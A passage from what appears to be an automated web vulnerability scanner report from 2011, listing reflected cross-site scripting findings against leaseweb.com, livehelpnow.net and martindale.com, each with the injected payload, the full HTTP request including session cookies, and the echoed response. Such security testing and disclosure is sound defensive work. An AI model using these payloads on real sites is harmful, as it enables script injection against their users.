The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25490"><script>alert(1)</script>56a88540018 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/shopping-cart25490"><script>alert(1)</script>56a88540018 HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:15:55 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 13910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cart25490"><script>alert(1)</script>56a88540018">
...[SNIP]...
4.104. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b337c"><script>alert(1)</script>24844152312 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enb337c"><script>alert(1)</script>24844152312/shopping-cart/login HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: https://www.leaseweb.com/en/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:51:42 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/enb337c"><script>alert(1)</script>24844152312/shopping-cart/login">
...[SNIP]...
4.105. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbddb"><script>alert(1)</script>dc5039635e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/shopping-cartfbddb"><script>alert(1)</script>dc5039635e6/login HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: https://www.leaseweb.com/en/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:52:24 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 13920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cartfbddb"><script>alert(1)</script>dc5039635e6/login">
...[SNIP]...
4.106. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /en/shopping-cart/login

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fcd8"><script>alert(1)</script>8190e06220 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/shopping-cart/login8fcd8"><script>alert(1)</script>8190e06220 HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Referer: https://www.leaseweb.com/en/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:54:24 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 13918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cart/login8fcd8"><script>alert(1)</script>8190e06220">
...[SNIP]...
4.107. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4b9"><script>alert(1)</script>82707070b8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7c4b9"><script>alert(1)</script>82707070b8a/lsw2/favicon.ico HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:39:31 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images7c4b9"><script>alert(1)</script>82707070b8a/lsw2/favicon.ico">
...[SNIP]...
4.108. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94b6"><script>alert(1)</script>b002c993ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/lsw2e94b6"><script>alert(1)</script>b002c993ba0/favicon.ico HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:40:30 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images/lsw2e94b6"><script>alert(1)</script>b002c993ba0/favicon.ico">
...[SNIP]...
4.109. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49983"><script>alert(1)</script>73bc73b149d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/lsw2/favicon.ico49983"><script>alert(1)</script>73bc73b149d HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:42:34 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images/lsw2/favicon.ico49983"><script>alert(1)</script>73bc73b149d">
...[SNIP]...
4.110. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdc04"%3balert(1)//274d575769 was submitted in the lhnid parameter. This input was echoed as fdc04";alert(1)//274d575769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288fdc04"%3balert(1)//274d575769&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?a=bsf_product&L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 18 Apr 2011 23:24:48 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9873


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pa
...[SNIP]...
<img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=173.193.214.243|1288fdc04";alert(1)//274d575769|4/18/2011 7:24:48 PM' />
...[SNIP]...
4.111. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fe467%3balert(1)//14b3eda9427 was submitted in the lhnid parameter. This input was echoed as fe467;alert(1)//14b3eda9427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288fe467%3balert(1)//14b3eda9427&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?a=bsf_product&L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 18 Apr 2011 23:24:49 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9873


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pa
...[SNIP]...
ion.protocol=='https:' || (typeof lhnJsHost !='undefined' && lhnJsHost == "https://"))
   {
       window.open('https://www.livehelpnow.net/lhn/livechatvisitor.aspx?zzwindow=' + lhnwindow + '&lhnid=' + 1288fe467;alert(1)//14b3eda9427 + '&d=' + 0,'lhnchat','left=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=' + sScrollbars + ',copyhistory=no,resizable=yes'
...[SNIP]...
4.112. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fa7e'%3balert(1)//7293da81ede was submitted in the t parameter. This input was echoed as 9fa7e';alert(1)//7293da81ede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f9fa7e'%3balert(1)//7293da81ede HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?a=bsf_product&L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 18 Apr 2011 23:25:01 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9632


var lhnTrack='f9fa7e';alert(1)//7293da81ede';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=-1;
InviteRepeats=0;

function pausecomp(millis)
...[SNIP]...
4.113. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7e4b6%3balert(1)//6935714a5ac was submitted in the zimg parameter. This input was echoed as 7e4b6;alert(1)//6935714a5ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=597e4b6%3balert(1)//6935714a5ac&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?a=bsf_product&L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 18 Apr 2011 23:24:46 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9712


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=-1;
InviteRepeats=0;

function p
...[SNIP]...
mageserver.ashx?lhnid=" + 1288 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferrer + "&pagetitle=" + lhnpagetitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 597e4b6;alert(1)//6935714a5ac + "&sres=" + lhnsRes + "&sdepth=" + lhnsDepth + "&flash=" + lhnflashversion + "&custom1=&custom2=&custom3=&t=" +lhnTrack + "&d=&rndstr=" + lhnrand_no + "'>
...[SNIP]...
4.114. http://www.martindale.com/Results.aspx [ft parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /Results.aspx

Issue detail

The value of the ft request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d074"style%3d"x%3aexpression(alert(1))"889001f78a5f9f252 was submitted in the ft parameter. This input was echoed as 5d074"style="x:expression(alert(1))"889001f78a5f9f252 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Results.aspx?frm=freesearch&afs=tokyo&prr=&newr=&nr=&z=&p=10&hid=&ft=15d074"style%3d"x%3aexpression(alert(1))"889001f78a5f9f252&ns=&n=0&ne=&sh=&rpp=&c=N&dv=&ra=key&ru=%2FResults.aspx HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/Results.aspx?ft=1&frm=freesearch&afs=tokyo
Cache-Control: max-age=0
Origin: http://www.martindale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=8a4b394aca6c4465b5e28b687e0053f8; __utmz=205508303.1303088570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; ASP.NET_SessionId=22d3qz553gvbwnf5ts4cfr55; mdc_session_id=04c4576600194df5acebfe5958420433; refDomain=www.martindale.com; CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181256217992090&InitialSearchId=201104181256217992090; op397mdcsearchresultsgum=a00y02z086274im05915n4274im0oc7m53321; op397mdcsearchresultsliid=a00y02z086274im05915n4274im0oc7m53321; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1303145820203:ss=1303145727607; __utma=205508303.1292355595.1303088570.1303091957.1303145728.3; __utmc=205508303; __utmb=205508303.5.10.1303145728

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 105196
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181303307998163&InitialSearchId=201104181303307998163; domain=.martindale.com; expires=Mon, 18-Apr-2011 17:58:57 GMT; path=/
Date: Mon, 18 Apr 2011 17:03:57 GMT
X-RE-Ref: 1 1607625934
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   attorneys, la
...[SNIP]...
<input type="hidden" id="ft" name="ft" value="15d074"style="x:expression(alert(1))"889001f78a5f9f252">
...[SNIP]...
4.115. http://www.martindale.com/Results.aspx [ft parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /Results.aspx

Issue detail

The value of the ft request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43fc8"style%3d"x%3aexpression(alert(1))"a87c929c975 was submitted in the ft parameter. This input was echoed as 43fc8"style="x:expression(alert(1))"a87c929c975 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Results.aspx?ft=143fc8"style%3d"x%3aexpression(alert(1))"a87c929c975&frm=freesearch&afs=tokyo HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-10.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=8a4b394aca6c4465b5e28b687e0053f8; __utmz=205508303.1303088570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; ASP.NET_SessionId=22d3qz553gvbwnf5ts4cfr55; mdc_session_id=04c4576600194df5acebfe5958420433; refDomain=www.martindale.com; CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; op397mdcsearchresultsgum=a00y02z086274im05915n4274im0p20jucbb4; op397mdcsearchresultsliid=a00y02z086274im05915n4274im0p20jucbb4; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1303145791458:ss=1303145727607; __utma=205508303.1292355595.1303088570.1303091957.1303145728.3; __utmc=205508303; __utmb=205508303.4.10.1303145728

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 103891
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181259087994432&InitialSearchId=201104181259087994432; domain=.martindale.com; expires=Mon, 18-Apr-2011 17:54:08 GMT; path=/
Date: Mon, 18 Apr 2011 16:59:08 GMT
X-RE-Ref: 1 1317179435
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   attorneys, la
...[SNIP]...
<input type="hidden" id="ft" name="ft" value="143fc8"style="x:expression(alert(1))"a87c929c975">
...[SNIP]...
4.116. http://www.martindale.com/Results.aspx [hid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /Results.aspx

Issue detail

